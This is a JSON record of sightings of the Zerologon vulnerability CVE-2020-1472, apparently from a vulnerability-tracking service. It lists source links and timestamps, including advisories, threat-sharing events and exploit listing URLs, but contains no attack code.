{"vulnerability": "cve-2020-1472", "sightings": [{"uuid": "ff04e558-99f3-4505-826e-b69c6838b85c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/e5e0a1d0-9ce0-400d-acdd-2a6c6f47bcb3", "content": "", "creation_timestamp": "2020-10-14T01:31:22.000000Z"}, {"uuid": "16e8778e-2832-4aa2-93aa-0608047d72ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/23e6786e-b796-48cc-8bb6-0e1ddb595c8a", "content": "", "creation_timestamp": "2020-10-16T06:26:38.000000Z"}, {"uuid": "d19ad9e0-b14e-4104-b906-2acdac67c7e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5f850411-c103-491f-abff-9421425403cf", "content": "", "creation_timestamp": "2020-10-21T08:19:11.000000Z"}, {"uuid": "1eff83ed-f3d8-4d0a-a401-de690c4fd8b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5b7316df-33f3-4e2e-95a2-55d4e7a8ee85", "content": "", "creation_timestamp": "2020-10-27T08:03:33.000000Z"}, {"uuid": "a71c27e7-6e0b-45b5-b9ad-19e755ce25e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/ae5eefd4-2626-4235-bd09-9924685780bd", "content": "", "creation_timestamp": "2020-11-18T18:55:51.000000Z"}, {"uuid": "594bea82-53a7-4ba0-a237-be3e57f38f65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/42d04e94-bf5b-427d-acc8-f5d740675941", "content": "", "creation_timestamp": "2020-10-20T15:57:21.000000Z"}, {"uuid": "a2771b54-121d-408e-97a0-b12b33e0b1a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/453274cf-e60d-452a-b88e-0bf6a5a6dae4", "content": "", "creation_timestamp": "2020-10-13T06:50:38.000000Z"}, {"uuid": "9b6ab4ed-5c19-4c90-a6e9-bbbf08220743", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/b426aa9c-dc22-4a91-8213-f8d513405423", "content": "", "creation_timestamp": "2020-12-09T07:18:56.000000Z"}, {"uuid": "ec5df526-fbd0-48f7-a1fa-42e2e428395b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/e8363b57-fbf3-40fb-934f-00f1ebc415fd", "content": "", "creation_timestamp": "2020-09-25T10:00:23.000000Z"}, {"uuid": "482b8ae8-3ac3-4c00-a777-19ad370eb20b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/f5030aca-7d5a-43a4-ae03-8f4ac8e85422", "content": "", "creation_timestamp": "2021-11-08T08:58:19.000000Z"}, {"uuid": "ee7ba8c2-e11d-4480-af9a-0002fe79fbc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2021-11-20T09:53:52.000000Z"}, {"uuid": "7a407eb1-4ef0-4a68-99d7-43f1714163b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/d925a2ee-e7cf-46f6-bec1-ad8e19122730", "content": "", "creation_timestamp": "2020-10-20T15:58:05.000000Z"}, {"uuid": "9ed2ac85-7eab-48a3-aa0c-694c29754802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/eafff3bd-a5ac-4799-b860-febbeaf42a54", "content": "", "creation_timestamp": "2020-10-19T15:29:02.000000Z"}, {"uuid": "d323fd81-7d6f-44ae-8db9-43c3c1e6b78b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/09e89b96-7b85-4a49-9556-d6b25b6b93e5", "content": "", "creation_timestamp": "2020-10-19T15:30:03.000000Z"}, {"uuid": "818819c9-95a3-41b7-b407-3fb2be89d14d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/f628d96f-2958-4717-91da-e86aace4925d", "content": "", "creation_timestamp": "2020-10-13T15:16:18.000000Z"}, {"uuid": "60db31c5-941c-4242-980b-272dd3f631ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/8d121e04-9fcc-48d9-be88-3af090913786", "content": "", "creation_timestamp": "2020-10-22T19:44:04.000000Z"}, {"uuid": "d5e69d2d-395f-4ed3-95e5-b6a8af54717b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/73846acc-5c3e-48e2-9c0a-c9de0351c60e", "content": "", "creation_timestamp": "2020-11-07T03:00:07.000000Z"}, {"uuid": "2ef8a26a-6f15-4106-9877-a6b393f30126", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5362d288-c25b-43e5-9311-2ddedfe84549", "content": "", "creation_timestamp": "2020-10-22T19:51:04.000000Z"}, {"uuid": "01fb1493-b55b-4629-aaa7-453e92d4a0e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/1bf3b9ea-9716-4615-8718-2c6ec9a0d635", "content": "", "creation_timestamp": "2020-11-17T19:15:04.000000Z"}, {"uuid": "852037c3-14b3-4413-bde2-7d4a805e2e4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/c7d9eed5-d71b-4433-8433-3db121149d72", "content": "", "creation_timestamp": "2020-11-21T03:00:06.000000Z"}, {"uuid": "819ffd2e-cce0-4a05-8284-dba1ebec956b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/44612345-f9b0-4600-ba82-7b8388a6592f", "content": "", "creation_timestamp": "2020-11-18T03:00:05.000000Z"}, {"uuid": "64d8c191-a278-4d50-8af3-dd58b57681ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5b421c0a-3bc4-4bce-a7cc-daa036ea090b", "content": "", "creation_timestamp": "2021-09-16T11:20:21.000000Z"}, {"uuid": "89f473bb-c891-4070-a071-222258aa5e7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "ea2a19ce-24d7-48a2-bf02-de8515b6a050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/be3a3889-2c18-4d6d-ae57-71ae24e32512", "content": "", "creation_timestamp": "2023-01-10T20:08:12.000000Z"}, {"uuid": "5e7dd05c-f0eb-45a2-bceb-641d59fed5ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/095ab3f1-cbae-4b5c-8534-34d42a458aa5", "content": "", "creation_timestamp": "2022-05-12T16:19:54.000000Z"}, {"uuid": "2a69030a-5ee7-479d-bff5-79814cfb016b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/63ddead6-4b82-414c-ad8e-c516b950b446", "content": "", "creation_timestamp": "2021-10-25T22:32:43.000000Z"}, {"uuid": "24e76273-7f67-4832-a60c-5a5e82f438b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/aaf97b2c-ad16-4ce6-928a-a440112d0fd3", "content": "", "creation_timestamp": "2024-09-16T19:13:31.000000Z"}, {"uuid": "fde39615-f1b9-411f-b6d2-aaf9015fa2f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/8a5d9ef7-0fae-4fcc-a606-d3701ec5f0e0", "content": "", "creation_timestamp": "2024-10-15T11:39:19.000000Z"}, {"uuid": "44d4f17c-a78d-4f27-b59c-a79c0aa2522a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/ad5af8e7-0c4c-4b64-b36d-1c80910c1140", "content": "", "creation_timestamp": "2023-06-23T06:24:08.000000Z"}, {"uuid": "57511465-1caa-4875-be29-7bdf188952f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/cec219ff-8f6d-45c9-bdbb-b4fb8c9c0f2b", "content": "", "creation_timestamp": "2023-09-20T10:39:36.000000Z"}, {"uuid": "15e9b780-03a9-416a-8443-b69ca916fe41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113549922551599234", "content": "", "creation_timestamp": "2024-11-26T15:18:37.016075Z"}, {"uuid": "55499d09-71df-4746-9ee4-beb5c2a5b569", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://msrc.microsoft.com/blog/2020/10/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/", "content": "", "creation_timestamp": "2020-10-29T06:00:00.000000Z"}, {"uuid": "1106f773-c455-4503-be34-770bd195aa02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://msrc.microsoft.com/blog/2021/01/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/", "content": "", "creation_timestamp": "2021-01-14T07:00:00.000000Z"}, {"uuid": "5e5788fd-0b78-47ee-b182-60191dc7e286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2970987", "content": "", "creation_timestamp": "2024-12-24T20:22:42.015800Z"}, {"uuid": "40576f4e-7f74-4acd-80ba-2253e8fb5690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "0c7453f8-c4a8-4aa1-ae74-d4c7b36685e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:24.000000Z"}, {"uuid": "d11546de-49bd-4b70-8fdc-c5f62f738559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3li5i54s5sp2p", "content": "", "creation_timestamp": "2025-02-14T15:06:51.072405Z"}, {"uuid": "2ba6c1fe-1b4a-47d7-871b-6dbb0336e524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:09:46.000000Z"}, {"uuid": "6f391517-9977-40e2-8125-03a71262f83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/23e6786e-b796-48cc-8bb6-0e1ddb595c8a", "content": "", "creation_timestamp": "2025-04-10T17:09:39.000000Z"}, {"uuid": "df07fbf7-ce61-4588-8df6-e9348262b4b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/strikoder/f854b31c91949abacdb498901cb0a548", "content": "", "creation_timestamp": "2025-06-28T11:13:37.000000Z"}, {"uuid": "6fadb6bb-149c-4f65-9234-ce74f227d953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-7358d820-9e7295ee585c5d83", "content": "", "creation_timestamp": "2025-04-30T17:58:26.981690Z"}, {"uuid": "1b7a2624-6653-457f-8f8a-5041e2814228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "7fdf30d7-6128-4264-9951-50f293bc18b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "97069a27-402a-4bd6-8454-6caa1af047d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "9be1c5b8-11fc-4504-bc06-037419b1ede3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "252a07bf-b52c-4651-b41d-914db14f2b8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "3c98e81d-64ff-45e6-8b01-c4a8ac7f0755", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "80578407-c893-4f73-b3ad-8edc7c15712e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "53596fbd-8ca7-4b21-a9ad-d723a6484b78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "a229f62a-5fe4-4352-8226-6ef2f452a2e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "bf57a0b1-ce8d-4cd5-abcf-3f9e477b11a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "27549039-ca0c-4c9d-b04f-926a39af43be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", "content": "", "creation_timestamp": "2020-09-22T19:37:57.000000Z"}, {"uuid": "a51f6190-e101-45bc-82b4-f6c8edbe0089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "a3b5892b-1ff9-41bd-b6d8-518b2ff795ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&utm_source=rss&utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "00f2f825-e320-466d-af09-0b092f145431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=F382D9A5-C23A-5DED-AD53-95C063D21BCB", "content": "", "creation_timestamp": "2025-10-18T13:33:56.000000Z"}, {"uuid": "d56022af-7913-474b-afba-8121b0ff73f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:05.000000Z"}, {"uuid": "d0924c10-2014-4ed0-959b-832ca86b4413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:12:46.000000Z"}, {"uuid": "b1cef8d7-331e-47b5-8e43-7e347cacebb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/strikoder/99635df00444bbf5fc90ca83ec8051a0", "content": "", "creation_timestamp": "2025-12-01T12:02:42.000000Z"}, {"uuid": "7f47402b-1773-4567-821b-2cf35d447c96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-c39acbe0-91886c343547fcce", "content": "", "creation_timestamp": "2025-12-05T12:35:58.738708Z"}, {"uuid": "3ae6c0d0-ca45-4885-af72-d7bdeeaa479e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-1fdfda19-2805a58255f192e9", "content": "", "creation_timestamp": "2026-03-06T10:29:26.852538Z"}, {"uuid": "c4c67c9d-f14b-4d68-baef-888b04b07874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://bsky.app/profile/cvedatabase.bsky.social/post/3mfcqatvdov2h", "content": "", "creation_timestamp": "2026-02-20T18:26:01.955473Z"}, {"uuid": "e37ac697-74f4-40fe-956f-c6b3b1d36f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/alon710/173eb4d5dfd9e2a8aa8dcc576ed70b11", "content": "", "creation_timestamp": "2026-02-06T23:50:06.000000Z"}, {"uuid": "7db3f012-f6a6-41a0-b5d3-e70ae290fa76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/hyokkaystyokaluja-julkaistu-kriittiselle-zerologon-haavoittuvuudelle", "content": "", "creation_timestamp": "2020-09-18T06:16:13.000000Z"}, {"uuid": "dc17aa6c-5a63-4834-becb-c3454bb95d76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/8a5d9ef7-0fae-4fcc-a606-d3701ec5f0e0", "content": "", "creation_timestamp": "2026-01-09T20:17:31.000000Z"}, {"uuid": "f3bf1e81-f654-4617-881f-ba84477e6386", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/d41ef7ed-39b6-4408-a718-2c3bce5fc99e", "content": "", "creation_timestamp": "2025-03-03T08:51:11.190614Z"}, {"uuid": "746ca620-7371-442f-88ca-2084ae6f0808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2020-1472", "type": "seen", "source": "https://mastodon.social/users/verbrecher/statuses/115899541969537991", "content": "", "creation_timestamp": "2026-01-15T14:17:45.097945Z"}, {"uuid": "a824b9e3-c0d2-4f80-9354-c0cbf72070d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://mastodon.social/users/verbrecher/statuses/115899549143144889", "content": "", "creation_timestamp": "2026-01-15T14:19:33.927368Z"}, {"uuid": "1347fdf9-f4c9-41b6-9371-b54a9ee1a6fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=499", "content": "", "creation_timestamp": "2020-08-12T04:00:00.000000Z"}, {"uuid": "b9e10817-9943-4727-8aa5-cd816ddc5dd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "7d5d2a69-e6fb-4f7d-a723-436db986935d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/f59984a2-fb70-4f3b-907e-489d2e9f1ee2", "content": "", "creation_timestamp": "2026-02-02T12:28:56.163404Z"}, {"uuid": "01aa9133-798a-42f2-ac32-940491a6560e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/86cbdda0-193d-4704-a9ae-84f65cac147e", "content": "", "creation_timestamp": "2026-02-02T12:25:27.989822Z"}, {"uuid": "ed67ba6e-77e6-424e-9b3e-19e04bc7e025", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "Telegram/4QOnyeYC_lTC0SMJQhtMgvSiM85xnm7m1QqUSxY6BArIyUs", "content": "", "creation_timestamp": 